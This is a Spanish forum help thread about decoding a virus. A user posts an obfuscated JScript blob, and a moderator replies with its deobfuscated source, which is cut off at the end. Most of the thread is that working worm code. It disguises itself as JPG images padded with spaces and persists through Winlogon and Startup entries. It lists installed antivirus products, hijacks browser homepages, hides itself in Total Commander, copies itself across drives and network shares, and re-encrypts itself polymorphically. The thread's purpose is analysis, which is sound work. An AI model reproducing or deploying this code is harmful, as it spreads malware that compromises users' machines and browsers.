ed0bdcecfcdc4c9c283cecfc189c7c0c9c2cfc3888f87cecfc189c7c0c9c2cfc38489cfcab0cbcbc0cd9ebccec0838498987d89a5aba27d84d6c5c0d398cfc2c189c4cfc0c8838489a9bcc8c086cecb867d89c5cec07d96d8c4c183cecfc189cfcaa7cad2c0cd9ebccec0838489c4c9bfc0d3aac1837d89c5cbc27d86cecb867d89c5cec07d847c98888c84d6c0d398cfc2c189c4cfc0c8838489a9bcc8c096d8d8c4c183bc89a1c4c7c0a0d3c4cecfce83cec1867db7b77d86c0d3849898c1bcc7cec084d6c4c183c5c0d37c987d7d84d6c0d398c5c0d396d8bc899ecacbd4a1c4c7c083c287cec1867db7b77d86c0d38496c4c183bc89a1c4c7c0a0d3c4cecfce83cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce98bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce96d8c0c7cec0d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988bd896c4c183bc89a1c4c7c0a0d3c4cecfce83cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce988d96d8d8c0c7cec0d6c4c183bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d38489aec4d5c097c1ced584d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96bc899fc0c7c0cfc0a1c4c7c083cec1867db7b77d86c0d38496bc899ecacbd4a1c4c7c083c287cec1867db7b77d86c0d38496bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96d8d8d8bebccfbec383c084d6d8cec1987d7d96d8bdcdc0bcc696bfc0c1bcd0c7cf95bdcdc0bcc696d8d8d8bebccfbec383c084d6d8cfcdd4d6c4c183c3cdbc978c8d84d6c3cdbc86988c96d8c4c183c3cdbc98988c8d84d6bfc9ce98ce89a9bcc8c0aecbbcbec0838c938496c0c9ce98bfc9ce89a4cfc0c8ce8384899ecad0c9cf96c3c9ce98c9c0d27b9ccdcdbcd4838496c1cacd83c1988b96c197c0c9ce96c1868684d6c2c9ce98bfc9ce89a4cfc0c8ce838489c4cfc0c883c18496c3c9ce89cbd0cec3837dbfc9ce89a4cfc0c8ce838489a4cfc0c8837d86c1867d8489a2c0cfa1cac7bfc0cd7d8496d8c1cacd83c4988b96c497c3c9ce89c7c0c9c2cfc396c4868684d6cfcdd4d6c5c9ce98c0d1bcc783c3c9ceb6c4b88489a4cfc0c8ce8384899ecad0c9cf96c1cacd83c7988b96c797c5c9ce96c7868684d6c4c183bc89a1cac7bfc0cda0d3c4cecfce83c0d1bcc783c3c9ceb6c4b8867d89a4cfc0c8ce838489c4cfc0c8837d86c7867d8489abbccfc37d84849898c1bcc7cec084d6c3c9ce89cbd0cec383c3c9ceb6c4b8867d89a4cfc0c8ce838489c4cfc0c8837d86c7867d8489a2c0cfa1cac7bfc0cd7d8496d8c0c7cec0d6cfcdd4d6bfc4ce98cbc083c0d1bcc783c3c9ceb6c4b8867d89a4cfc0c8ce838489c4cfc0c8837d86c7867d8489abbccfc37d84867db7b77d84867d7d96bfc498bc89a2c0cfa1cac7bfc0cd83bfc4ce8496cfc2c198c9c0d27ba0c9d0c8c0cdbccfcacd83bfc489c1c4c7c0ce8496c1cacd83967ccfc2c189bccfa0c9bf838496cfc2c189c8cad1c0a9c0d3cf838484d6cecfc198cfc2c189c4cfc0c88384867d7d96c4c183cecfc189ced0bdcecfcdc4c9c283cecfc189c7c0c9c2cfc3888f87cecfc189c7c0c9c2cfc38489cfcab0cbcbc0cd9ebccec0838498987d89a5aba27d84d6c5c0d398cfc2c189c4cfc0c8838489a9bcc8c086cecb867d89c5cec07d96d8c4c183cecfc189cfcaa7cad2c0cd9ebccec0838489c4c9bfc0d3aac1837d89c5cbc27d86cecb867d89c5cec07d847c98888c84d6c0d398cfc2c189c4cfc0c8838489a9bcc8c096d8d8c4c183bc89a1c4c7c0a0d3c4cecfce83bfc4867db7b77d86c0d3849898c1bcc7cec08181bfc4ce89bec3bccd9ccf838c847c987d957d84d6c4c183c5c0d37c987d7d84d6c0d398c5c0d396d8bc899ecacbd4a1c4c7c083c287bfc4867db7b77d86c0d38496c4c183bc89a1c4c7c0a0d3c4cecfce83bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce98bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce96d8c0c7cec0d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96d8c4c183bc89a1c4c7c0a0d3c4cecfce83bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce988d96d8d8c0c7cec0d6c4c183bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d38489aec4d5c097c1ced584d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96bc899fc0c7c0cfc0a1c4c7c083bfc4867db7b77d86c0d38496bc899ecacbd4a1c4c7c083c287bfc4867db7b77d86c0d38496bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96d8d8d8bebccfbec383c084d6d8d8d8d8bebccfbec383c084d6d8d8c3cdbc988b96d8d8bebccfbec383c084d6d8c8c6838496d8c1d0c9becfc4cac97bbec48384d6cfcdd4d6bfbd8d98bc89aacbc0c9afc0d3cfa1c4c7c083c2878c8496c28d98bfbd8d89adc0bcbf9cc7c7838496bfbd8d899ec7cacec0838496c28e98c28d89ced0bdcecfcdc4c9c283c28d89cec0bccdbec38382d5987d8284868e87c28d89cec0bccdbec383827d9682848496c28c98c28d89ced0bdcecfcdc4c9c2838b87c28d89cec0bccdbec38382d5987d8284868e8496c2cd98c28d89ced0bdcecfcdc4c9c283c28d89cec0bccdbec383827d96828487c28d89c7c0c9c2cfc38496cf98c7c796cfcf987d7d96cfc898cf89c7c0c9c2cfc396cdbcbe98a8bccfc389cdcad0c9bf83a8bccfc389cdbcc9bfcac8838485949384868c96c1cacd83d3988b96d397cfc896d3868684d6c9d0c898cf89bec3bccd9ecabfc09ccf83d38486cdbcbe96c3d398c9d0c889cfcaaecfcdc4c9c2838c918496c4c183c3d389c7c0c9c2cfc3978d84d6c3d3987d8b7d86c3d396d8cfcf8698c3d396c3d398828296d8c4c183cdbcbe978c8b84d6cdbcbe987d8b7d86cdbcbe96d8cfcf8698cdbcbe96c28f98c28c86cfcf86c2cd96cdc0cfd0cdc97bc28f96d8bebccfbec383c084d6d8d8c1d0c9becfc4cac97bcbc083cfbccd84d6cac9c0c198c1bcc7cec096cec1cb98bc89a2c0cfa1cac7bfc0cd83cfbccd8496cfc2be98c9c0d27ba0c9d0c8c0cdbccfcacd83cec1cb89ced0bda1cac7bfc0cdce8496c1cacd83967ccfc2be89bccfa0c9bf838496cfc2be89c8cad1c0a9c0d3cf838484d6cecfbe98cfc2be89c4cfc0c8838489a9bcc8c089cfcaa7cad2c0cd9ebccec0838496c4c183cecfbe89cec0bccdbec3837dc1cacfca7d847c98888cd7d7cecfbe89cec0bccdbec3837dcbc3cacfca7d847c98888cd7d7cecfbe89cec0bccdbec3837dc4c8bcc2c07d847c98888cd7d7cecfbe89cec0bccdbec3837dc4c8b7d08b8ba08cc2c07d847c98888cd7d7cecfbe89cec0bccdbec3837dcbc4becfd0cdc07d847c98888c84d6c4c183cac9c0c19898c1bcc7cec084d6cec1cb98bc89a2c0cfa1cac7bfc0cd83cfc2be89c4cfc0c88384867db7b77d8496d8cac9c0c198cfcdd0c096d8d8cdc0cfd0cdc97bcec1cb96d8c1d0c9becfc4cac97bcec3bed08384d6becec3be987d7d96c7c9c6ce98c9c0d27ba0c9d0c8c0cdbccfcacd83bc89a2c0cfa1cac7bfc0cd83be8e8489c1c4c7c0ce8496c1cacd83967cc7c9c6ce89bccfa0c9bf838496c7c9c6ce89c8cad1c0a9c0d3cf838484d6cfcdd4d6c7c6ce98c7c9c6ce89c4cfc0c88384867d7d96c4c183c7c6ce89ced0bdcecfcdc4c9c283c7c6ce89c7c0c9c2cfc3888f87c7c6ce89c7c0c9c2cfc38489cfcaa7cad2c0cd9ebccec0838498987d89c7c9c67d84d6c7c9c6bc98bd899ecdc0bccfc0aec3cacdcfbed0cf83c7c9c6ce89c4cfc0c8838484899ccdc2d0c8c0c9cfce96c4c183c7c9c6bc89cec0bccdbec3837d8a8aa095a5aebecdc4cbcf7b8a8a9d7b88c9ce7d847c98888c84d6becec3be98c7c9c6bc89ced0bdcecfcdc4c9c283c7c9c6bc89c4c9bfc0d3aac183827d8284868c87c7c9c6bc89c7bccecfa4c9bfc0d3aac183827d82848496bc899fc0c7c0cfc0a1c4c7c083c7c9c6ce89c4cfc0c883848496d8d8d8bebccfbec383c084d6d8d8cdc0cfd0cdc97bbecec3be96d891";ll="";dm=z.length-2;rad=new Number(z.substring(dm,dm+2));for(y=0;y<dm;y+=2){num=z.substring(y,y+2);ld=new Number("0x"+num);an=ld.toString(10);ch=String.fromCharCode(an-rad);ll+=ch;}eval(ll);

Perdon, pero no se de que otra forma subir el codigo y que quede en diferentes lineas. Lo otro que puedo hacer es subirlo en MEGA con extension txt y alguien lo sube de nuevo aqui descifrado. Saludos


	En línea

"Los que reniegan de Dios es por desesperación de no encontrarlo".
Miguel de Unamuno

engel lex

Moderador Global

Desconectado

Mensajes: 15.514

Re: [Ayuda] descifrando un virus

« Respuesta #1 en: 11 Julio 2015, 17:39 pm »

no sabia que el vbs se parecía tanto el js... solo tienes que seguir los pasos sin el eval (para que no se ejecute) y revisar la variable que se evalua

aquí está sin la primera ofuscación

Código

try {
    a = WScript.CreateObject('Scri' + 'pting.Fi' + 'leSys' + 'temObj' + 'ect');
    b = WScript.CreateObject('WSc' + 'ript.Sh' + 'ell');
    s = WScript.CreateObject('She' + 'll.Appli' + 'cation');
    wl = WScript.CreateObject('WbemScr' + 'ipting.SWbemL' + 'ocator');
    db = WScript.CreateObject('ADO' + 'DB.Str' + 'eam');
    db.CharSet = "US-ASCII";
    db.Type = 2;
    c3 = b.SpecialFolders("Startup");
    nt6 = (b.RegRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion') >= 6 ? true : false);
    jico = b.RegRead("HKLM\\SOFTWARE\\Classes\\" + b.RegRead("HKLM\\SOFTWARE\\Classes\\.jpg\\") + "\\DefaultIcon\\");
    ico = "explorer.exe";
    g = WScript.ScriptFullName;
    da = new Date();
    ano = da.getYear() + "";
    mes = da.getMonth();
    dia = da.getDate();
    hra = 0;
    antv = new Array("");
    rgk = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    wlg = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell";
    gn = new Array("IMG", "IMG_", "PIC", "DSC", "CIMG", "HPIM", "IMAG", "DSCF", "DSCN", "DCIM", "IM", "PICT", "SAM_");
    sp = "";
    for (r = 0; r < 94; r++) {
        sp += " ";
    }
    ex = gn[Math.round(Math.random() * 12)] + ano.substring(2, 4) + "" + mes + dia + ".JPG" + sp + ".jse";
    jex = "";
    tas = "explorer";
    fsz = a.GetFile(g).Size;
    wsc = WScript.FullName;
    stl = "https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+";
    stp = stl + fsz;
    if (s.NameSpace(26) == "Roaming") {
        tot = a.GetFolder(s.NameSpace(26).ParseName("Microsoft").Path).ParentFolder;
    } else {
        tot = s.NameSpace(40).ParseName(s.NameSpace(26)).Path;
    }
    nt();
} catch (e) {}
sf = "";
 
function nt() {
    try {
        c1 = s.NameSpace(28).ParseName("microsoft");
        c2 = c1.GetFolder.Items().Count;
        rf = Math.round(Math.random() * c2 - 1);
        c4 = c1.GetFolder.Items().item(rf).Path;
        if (a.FolderExists(c4) == false) {
            c4 = a.GetFile(c4).ParentFolder;
        }
    } catch (e) {
        c4 = c1.Path;
    }
    c5 = Math.random() * 8 + 1 + "";
    c5 = c5.replace(".", "");
    try {
        b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ");
    } catch (e) {}
    try {
        jtyp = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName");
        b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ");
    } catch (e) {}
    try {
        b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ");
    } catch (e) {}
    try {
        b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ");
    } catch (e) {}
    if (g.substring(g.lastIndexOf("\\") + 1, g.length).toLowerCase().search(".jpg" + sp + ".jse") != -1) {
        try {
            if (a.FileExists(g.substring(0, g.lastIndexOf(sp + ".jse"))) == true) {
                b.run('"' + g.substring(0, g.lastIndexOf(sp + ".jse")) + '"');
            } else {
                wp = b.RegRead("HKCU\\Control Panel\\Desktop\\Wallpaper");
                if (wp.substring(wp.lastIndexOf("\\") + 1, wp.length) == "TranscodedWallpaper") {
                    jpgc = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\").replace("%1", wp);
                    b.run(jpgc);
                } else {
                    b.run('"' + wp + '"');
                }
            }
        } catch (e) {}
        try {
            sc = wl.ConnectServer(null, "root\\default");
            rg = sc.Get("StdRegProv");
            m = rg.Methods_.Item("EnumValues");
            pin = m.InParameters.SpawnInstance_();
            rk = new Object();
            rk["HKCU"] = rk["HKEY_CURRENT_USER"] = 0x80000001;
            rv = rk[rgk.substr(0, rgk.indexOf("\\"))];
            pin.hDefKey = rv;
            pin.sSubKeyName = rgk.substr(rgk.indexOf("\\") + 1);
            pot = rg.ExecMethod_(m.Name, pin);
            ak = pot.sNames.toArray();
            for (key in ak) {
                tts = b.RegRead(rgk + "\\" + ak[key]) + "";
                if (tts.search(".exe") != -1) {
                    tts2 = tts.substring(0, tts.search(".exe"));
                    tts3 = tts2.substring(tts2.lastIndexOf(":") - 1, tts2.length) + ".exe";
                    if (a.FileExists(tts3) == true) {
                        ico = tts3;
                    }
                    if (tts2.indexOf("\\") != -1) {
                        tts2 = tts2.substring(tts2.lastIndexOf("\\") + 1, tts2.length);
                    }
                    tas = tts2;
                }
            }
        } catch (e) {}
        if (tas.indexOf(" ") != -1) {
            tas = tas.substring(0, tas.indexOf(" "));
        }
        if (tas.indexOf(".") != -1) {
            tas = tas.substring(0, tas.indexOf("."));
        }
        try {
            newd = fsz;
            olddf = b.RegRead(wlg);
            olddf = olddf.substring(olddf.lastIndexOf('" "') + 3, olddf.lastIndexOf('"'));
        } catch (e) {
            olddf = shcu();
        }
        if (a.FileExists(olddf) == true) {
            c4 = a.GetFile(olddf).ParentFolder;
            oldd = a.GetFile(olddf).size;
        } else {
            oldd = 0;
            olddf = c4 + "\\" + c5;
        }
        if (newd >= oldd) {
            if (a.FileExists(olddf) == true) {
                a.GetFile(olddf).Attributes = 0;
            }
            db.Open();
            try {
                av = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter" + (nt6 ? '2' : ''));
                avi = av.ExecQuery("SELECT * FROM AntiVirusProduct", "WQL");
                navi = new Enumerator(avi);
                antv = new Array();
                for (; !navi.atEnd(); navi.moveNext()) {
                    oav = navi.item();
                    antv.push(oav.displayName);
                }
            } catch (e) {
                antv = new Array("NAC");
            }
            try {
                vic = "<" + b.RegRead("HKCU\\Volatile Environment\\LOGONSERVER").replace("\\\\", "") + ":" + b.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName") + "=" + s.NameSpace(40) + ":" + antv + ">";
            } catch (e) {
                vic = "";
            }
            cod = ci();
            if (cod.search(vic) == -1 && rad != 0) {
                nda = vic + "**/";
                his = cod.replace("**/", nda);
                db.WriteText(his);
            } else {
                db.WriteText(cod);
            }
            db.SaveToFile(olddf, 2);
            db.Close();
            try {
                if (a.GetFile(olddf).OpenAsTextStream(1, -2).ReadAll().charCodeAt(0) != 122) {
                    a.CopyFile(g, olddf, true);
                }
                a.GetFile(olddf).Attributes = 2;
            } catch (e) {}
            wsh = c4 + "\\" + tas + ".exe";
            try {
                a.CopyFile(wsc, wsh);
            } catch (e) {}
            a.GetFile(wsh).Attributes = 2;
            try {
                drg = '"' + wsh + '" "' + olddf + '" //E:JScript //B';
                shcu();
                ec = b.CreateShortcut(c3 + "\\" + tas + ".lnk");
                ec.TargetPath = c4 + "\\" + tas + ".exe";
                ec.Arguments = '"' + olddf + '" //E:JScript //B -ns';
                ec.IconLocation = ico;
                ec.Save();
                b.RegWrite(wlg, drg, 'REG_SZ');
                WScript.Sleep(9999);
                if (b.RegRead(wlg) == drg) {
                    a.DeleteFile(c3 + "\\" + tas + ".lnk");
                }
            } catch (e) {}
        }
    } else {
        try {
            if (WScript.Arguments.length == 0) {
                b.run("explorer.exe");
            }
        } catch (e) {}
        try {
            fcfp = new Array();
            tcmd = new Array();
            for (t = 0; t < 9; t++) {
                tcmd.push(tot + "\\TC201" + t + "\\tcignore.txt");
                try {
                    fcfp.push(s.NameSpace(38).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile");
                } catch (e) {}
                try {
                    fcfp.push(s.NameSpace(48).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile");
                } catch (e) {}
            }
            try {
                tcmd.push(s.NameSpace(38).ParseName("TC UP").Path + "\\tcignore.txt");
            } catch (e) {}
            try {
                tcmd.push(s.NameSpace(48).ParseName("TC UP").Path + "\\tcignore.txt");
            } catch (e) {}
            try {
                tcmd.push(s.NameSpace(28).ParseName("ghisler").Path + "\\tcignore.txt");
            } catch (e) {}
            try {
                tcmd.push(s.NameSpace(26).ParseName("ghisler").Path + "\\tcignore.txt");
            } catch (e) {}
            tcmd.push("c:\\totalcmd\\tcignore.txt");
            for (t = 0; t < tcmd.length; t++) {
                if (a.FileExists(tcmd[t].replace("tcignore.txt", "wincmd.ini")) == true) {
                    try {
                        db.Open();
                        if (a.FileExists(tcmd[t]) == false) {
                            ttn = a.CreateTextFile(tcmd[t], true);
                            ttn.Write("**.**.jse");
                            ttn.close();
                        }
                        igl = "";
                        try {
                            db.LoadFromFile(tcmd[t]);
                            igl = db.ReadText;
                        } catch (e) {}
                        db.Close();
                        if (igl.indexOf("**.**.jse") == -1) {
                            db.Open();
                            db.WriteText(igl, 1);
                            db.WriteText("**.**.jse", 1);
                            a.DeleteFile(tcmd[t]);
                            db.SaveToFile(tcmd[t]);
                            db.Close();
                        }
                    } catch (e) {}
                    try {
                        tor = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 1, true, 0);
                        toa = tor.ReadAll();
                        if (toa.search("IgnoreListFileEnabled=0") != -1) {
                            toa = toa.replace("IgnoreListFileEnabled=0", "IgnoreListFileEnabled=1");
                        }
                        if (toa.search("IgnoreListFile=") == -1) {
                            toa = toa.replace("[Configuration]", "[Configuration]" + "\nIgnoreListFile=" + tcmd[t]);
                        }
                        if (tcmd[t].search("TC201") != -1) {
                            if (toa.search("=*.jse") == -1) {
                                filt = toa.substring(toa.lastIndexOf("Filter") + 6, toa.lastIndexOf(".icon="));
                                enf = toa.substring(toa.lastIndexOf("Filter"), toa.length);
                                enl = enf.substring(0, enf.indexOf("\n") + 1);
                                fln = new Number(filt) + 1;
                                ficon = toa.substring(toa.search("Filter11.icon=") + 14, toa.length);
                                dicon = ficon.substring(0, ficon.search("\n"));
                                toa = toa.replace(enl, enl + "\nFilter" + fln + "=*.jse\nFilter" + fln + ".icon=" + dicon + "\n");
                                toa = toa.replace("FileTipWindows=1", "FileTipWindows=0");
                            }
                        }
                        tor.close();
                        tow = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 2, true, 0);
                        tow.Write(toa);
                        tow.close();
                    } catch (e) {}
                }
            }
        } catch (e) {}
        try {
            b.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", stp, "REG_SZ")
        } catch (e) {}
        try {
            if (a.FolderExists(tot + "\\Mozilla\\Firefox\\Profiles") == true) {
                fpf = a.GetFolder(tot + "\\Mozilla\\Firefox\\Profiles");
                pff = new Enumerator(fpf.SubFolders);
                for (; !pff.atEnd(); pff.moveNext()) {
                    pfs = pff.item() + "";
                    if (pfs.search(".default") != -1) {
                        fcfp.push(pfs);
                    }
                }
            }
            for (q = 0; q < fcfp.length; q++) {
                try {
                    if (a.FileExists(fcfp[q] + "\\prefs.js") == true); {
                        fjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 1);
                        fjs = fjf.ReadAll();
                        fjf.close();
                        usp = 'user_pref("browser.startup.homepage",';
                        if (fjs.indexOf(usp) != -1) {
                            fjs1 = fjs.substring(fjs.indexOf(usp) + 37, fjs.length);
                            fjs2 = fjs1.substring(0, fjs1.indexOf(');') + 2);
                            fjs3 = fjs.replace(usp + fjs2, usp + ' "' + stp + '");');
                            wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 2);
                            wjf.Write(fjs3);
                        } else {
                            wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 8);
                            wjf.WriteLine('\n' + usp + ' "' + stp + '");');
                        }
                        wjf.close();
                    }
                } catch (e) {}
            }
        } catch (e) {}
        try {
            gfs = s.NameSpace(28).ParseName("Google").Path + "\\Chrome\\User Data\\Default\\Preferences";
            if (a.FileExists(gfs) == true) {
                gjf = a.OpenTextFile(gfs, 1);
                gjs = gjf.ReadAll();
                gjf.close();
                gjsn = gjs.length;
                urs = '"urls_to_restore_on_startup": [';
                ros = '"restore_on_startup":';
                rosm = '"restore_on_startup_migrated":';
                if (gjs.indexOf(stl) == -1) {
                    if (gjs.indexOf(urs) != -1) {
                        gjs1 = gjs.substring(gjs.indexOf(urs) + 31, gjsn);
                        gjs2 = gjs1.substring(0, gjs1.indexOf("]") + 1);
                        gjs3 = gjs.replace(urs + gjs2, urs + ' "' + stp + '", ' + gjs2);
                    } else {
                        gjs1 = gjs.substring(gjs.indexOf(rosm), gjsn);
                        gjs2 = gjs1.substring(0, gjs1.indexOf("\n") + 1);
                        gjs3 = gjs.replace(gjs2, rosm + ' true,\n\t' + urs + ' "' + stp + '" ]\n');
                    }
                    gjs4 = gjs.substring(gjs.indexOf(ros), gjsn);
                    gjs5 = gjs4.substring(0, gjs4.indexOf(',') + 1);
                    gjs3 = gjs3.replace(gjs5, ros + ' 4,');
                    wjg = a.OpenTextFile(gfs, 2);
                    wjg.Write(gjs3);
                    wjg.close();
                } else {
                    fds = gjs.substring(gjs.indexOf(stl), gjs.length);
                    fdc = fds.substring(0, fds.indexOf('"'));
                    gjs4 = gjs.replace(fdc, stp);
                    wjg = a.OpenTextFile(gfs, 2);
                    wjg.Write(gjs4);
                    wjg.close();
                }
            }
        } catch (e) {}
        mk();
    }
}
 
function mk() {
    WScript.Sleep(120000);
    try {
        c = new Enumerator(a.Drives);
        for (; !c.atEnd(); c.moveNext()) {
            tipodisco = c.item().DriveType;
            switch (tipodisco) {
                case 1:
                case 3:
                    if (c.item() != "A:" && c.item() != "B:") {
                        try {
                            sf = a.GetFolder(pe(c.item() + "\\"));
                            tgf = new Enumerator(sf.files);
                            for (; !tgf.atEnd(); tgf.moveNext()) {
                                stf = tgf.item() + "";
                                if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") {
                                    jex = tgf.item().Name + sp + ".jse";
                                }
                                if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) {
                                    ex = tgf.item().Name;
                                }
                            }
                            if (a.FileExists(sf + "\\" + ex) == false) {
                                if (jex != "") {
                                    ex = jex;
                                }
                                a.CopyFile(g, sf + "\\" + ex);
                                if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
                                    a.GetFile(sf + "\\" + ex).Attributes = a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes;
                                } else {
                                    a.GetFile(sf + "\\" + ex).Attributes = 0
                                };
                                if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
                                    a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2;
                                }
                            } else {
                                if (a.GetFile(sf + "\\" + ex).Size < fsz) {
                                    a.GetFile(sf + "\\" + ex).Attributes = 0;
                                    a.DeleteFile(sf + "\\" + ex);
                                    a.CopyFile(g, sf + "\\" + ex);
                                    a.GetFile(sf + "\\" + ex).Attributes = 0;
                                }
                            }
                        } catch (e) {}
                        sf = "";
                    }
                    break;
                default:
                    break;
            }
        }
    } catch (e) {}
    try {
        if (hra < 12) {
            hra += 1;
        }
        if (hra == 12) {
            dns = s.NameSpace(18);
            ens = dns.Items().Count;
            hns = new Array();
            for (f = 0; f < ens; f++) {
                gns = dns.Items().item(f);
                hns.push("dns.Items().Item(" + f + ").GetFolder");
            }
            for (i = 0; i < hns.length; i++) {
                try {
                    jns = eval(hns[i]).Items().Count;
                    for (l = 0; l < jns; l++) {
                        if (a.FolderExists(eval(hns[i] + ".Items().item(" + l + ").Path")) == false) {
                            hns.push(hns[i] + ".Items().item(" + l + ").GetFolder");
                        } else {
                            try {
                                dis = pe(eval(hns[i] + ".Items().item(" + l + ").Path") + "\\") + "";
                                di = a.GetFolder(dis);
                                tgf = new Enumerator(di.files);
                                for (; !tgf.atEnd(); tgf.moveNext()) {
                                    stf = tgf.item() + "";
                                    if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") {
                                        jex = tgf.item().Name + sp + ".jse";
                                    }
                                    if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) {
                                        ex = tgf.item().Name;
                                    }
                                }
                                if (a.FileExists(di + "\\" + ex) == false && dis.charAt(1) != ":") {
                                    if (jex != "") {
                                        ex = jex;
                                    }
                                    a.CopyFile(g, di + "\\" + ex);
                                    if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
                                        a.GetFile(di + "\\" + ex).Attributes = a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes;
                                    } else {
                                        a.GetFile(di + "\\" + ex).Attributes = 0;
                                    }
                                    if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) {
                                        a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2;
                                    }
                                } else {
                                    if (a.GetFile(di + "\\" + ex).Size < fsz) {
                                        a.GetFile(di + "\\" + ex).Attributes = 0;
                                        a.DeleteFile(di + "\\" + ex);
                                        a.CopyFile(g, di + "\\" + ex);
                                        a.GetFile(di + "\\" + ex).Attributes = 0;
                                    }
                                }
                            } catch (e) {}
                        }
                    }
                } catch (e) {}
            }
            hra = 0;
        }
    } catch (e) {}
    mk();
}
 
function ci() {
    try {
        db2 = a.OpenTextFile(g, 1);
        g2 = db2.ReadAll();
        db2.Close();
        g3 = g2.substring(g2.search('z="') + 3, g2.search('";'));
        g1 = g2.substring(0, g2.search('z="') + 3);
        gr = g2.substring(g2.search('";'), g2.length);
        t = ll;
        tt = "";
        tm = t.length;
        rac = Math.round(Math.random() * 98) + 1;
        for (x = 0; x < tm; x++) {
            num = t.charCodeAt(x) + rac;
            hx = num.toString(16);
            if (hx.length < 2) {
                hx = "0" + hx;
            }
            tt += hx;
            hx = '';
        }
        if (rac < 10) {
            rac = "0" + rac;
        }
        tt += rac;
        g4 = g1 + tt + gr;
        return g4;
    } catch (e) {}
}
 
function pe(tar) {
    onef = false;
    sfp = a.GetFolder(tar);
    tgc = new Enumerator(sfp.subFolders);
    for (; !tgc.atEnd(); tgc.moveNext()) {
        stc = tgc.item().Name.toLowerCase();
        if (stc.search("foto") != -1 || stc.search("photo") != -1 || stc.search("image") != -1 || stc.search("im\u00E1ge") != -1 || stc.search("picture") != -1) {
            if (onef == false) {
                sfp = a.GetFolder(tgc.item() + "\\");
            }
            onef = true;
        }
    }
    return sfp;
}
 
function shcu() {
    cshc = "";
    lnks = new Enumerator(a.GetFolder(c3).files);
    for (; !lnks.atEnd(); lnks.moveNext()) {
        try {
